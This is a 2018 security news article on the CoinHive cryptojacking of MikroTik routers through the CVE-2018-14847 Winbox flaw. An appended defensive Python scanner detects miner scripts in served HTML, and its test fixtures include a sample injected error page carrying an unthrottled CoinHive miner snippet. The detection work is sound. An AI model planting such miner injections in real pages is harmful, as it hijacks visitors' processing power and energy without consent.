
Thousands of MikroTik Routers Go Bad Following a CoinHive Infection

Posted: August 15, 2018

The practice of mining cryptocurrency at someone else's expense, known as cryptojacking, is a phenomenon that seems unlikely to go out of fashion any time soon, and the sheer growth of attacks aimed at injecting crypto-mining code into targeted devices proves it. The all-out attack against MikroTik routers that originated on July 31 in Brazil is no exception. First reported by Trustwave security specialist Simon Kenin, the attack exploited the CVE-2018-14847 Winbox flaw to gain unauthorized access to the routers, eventually dropping the CoinHive script on 170,000 devices and counting, with the ultimate goal of mining Monero coins.

Why MikroTik Routers?

The sudden flood of CoinHive hits did not pass through thousands of MikroTik routers by chance. Since MikroTik routers are a popular option not only among large organizations but also among Internet Service Providers, they must have been an obvious target. After all, when ISPs themselves fall victim to compromised routers, all their subscribers run the risk of infection as well. That is what happened to a web user who complained on Reddit about a persistent, self-executing CoinHive script present on every website he/she landed on. The post also said that no user action could stop CoinHive from popping up everywhere, which led Trustwave's Simon Kenin to suspect a more severe threat beyond the scope of individual users.

Further research not only confirmed this theory but also revealed that the attacker had gone the extra mile by configuring the MikroTik devices to execute the CoinHive script whenever a web user connects to the wireless network operated by an infected MikroTik router. Additional functionality embedded in the script included:

  • A backdoor allowing for editing the code.
  • An "error page" generator frequently bombarding web surfers with custom error pages carrying CoinHive.

Exploiting an Already Patched Vulnerability

To inject CoinHive into a myriad of MikroTik routers, the actors involved took advantage of the so-called Winbox bug (CVE-2018-14847), a vulnerability which, if exploited, could grant admin access to a MikroTik router. However, the Latvian company patched this vulnerability back in April, which raises the question of why the CoinHive injection went through nonetheless. The answer is that a large number of MikroTik's customers did not update their routers in time. Had they done so, the CoinHive infection could and should have been avoided.

Who Benefits the Most From CoinHive?

CoinHive is a cryptocurrency mining platform intended to serve as an alternative to online advertising. In exchange for no more intrusive pop-ups, users lend some of their processing power to the platform's developers, who keep a portion of the generated cryptocurrency while giving the remainder to the site owner. Provided that the script's settings impose a reasonable CPU limit, the site's visitors should experience only a minor slowdown. When utilized by malware actors, however, CoinHive is usually set to draw the maximum CPU power. The results are poor computer performance and higher energy costs, which can easily outweigh the absence of ads. In such cases, it is the hackers in charge who are the big winners, as they get to mine Monero coins while others pay the price.
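A defender-side check for the two behaviours described above (CoinHive delivered through injected error pages, and the miner configured with no CPU limit), written as an added example that is not part of the original article or of Trustwave's report. It scans HTML served to a client for the public CoinHive loader and miner constructors of 2018 (`coinhive.min.js`, `CoinHive.Anonymous`, `CoinHive.User`, the `throttle` option); the sample pages and the site key are constructed placeholders.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Markers of the CoinHive browser miner: the loader script and the miner
# constructors. These are CoinHive's public names, not taken from the article.
LOADER_RE = re.compile(r"coinhive\.min\.js", re.IGNORECASE)
MINER_RE = re.compile(
    r"new\s+CoinHive\.(?:Anonymous|User)\s*\(\s*['\"]([A-Za-z0-9]+)['\"]"
    r"(?:\s*,\s*['\"][^'\"]*['\"])?"   # optional user name (CoinHive.User)
    r"(?:\s*,\s*\{([^}]*)\})?"         # optional options object
)
THROTTLE_RE = re.compile(r"throttle\s*:\s*([0-9]*\.?[0-9]+)")


@dataclass
class Finding:
    site_key: str
    throttle: Optional[float]  # None when the script sets no throttle
    max_cpu: bool              # True when the miner may use the full CPU


def scan_html(html: str) -> Optional[Finding]:
    """Return a Finding if the page carries a CoinHive miner, else None."""
    m = MINER_RE.search(html)
    if m is None:
        if LOADER_RE.search(html) is None:
            return None
        # Loader present but no visible instantiation: flag it, assume worst.
        return Finding(site_key="", throttle=None, max_cpu=True)
    site_key, options = m.group(1), m.group(2) or ""
    t = THROTTLE_RE.search(options)
    throttle = float(t.group(1)) if t else None
    # CoinHive treats a missing throttle as 0, i.e. no CPU limit at all.
    return Finding(site_key, throttle, max_cpu=(not throttle))


# Constructed sample pages (site key is a placeholder, not a real key).
CLEAN_PAGE = "<html><body><h1>404 Not Found</h1></body></html>"
THROTTLED_PAGE = (
    "<script src='https://coinhive.com/lib/coinhive.min.js'></script>"
    "<script>var miner = new CoinHive.Anonymous('SITEKEYPLACEHOLDER',"
    " {throttle: 0.7}); miner.start();</script>"
)
INJECTED_ERROR_PAGE = (
    "<html><body><h1>Error</h1>"
    "<script src='https://coinhive.com/lib/coinhive.min.js'></script>"
    "<script>var miner = new CoinHive.Anonymous('SITEKEYPLACEHOLDER');"
    " miner.start();</script></body></html>"
)
```

Run it over responses captured on a subscriber's network: a hit with `max_cpu` set on a page that should never carry a miner, such as a router's error page, is the pattern this article describes.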
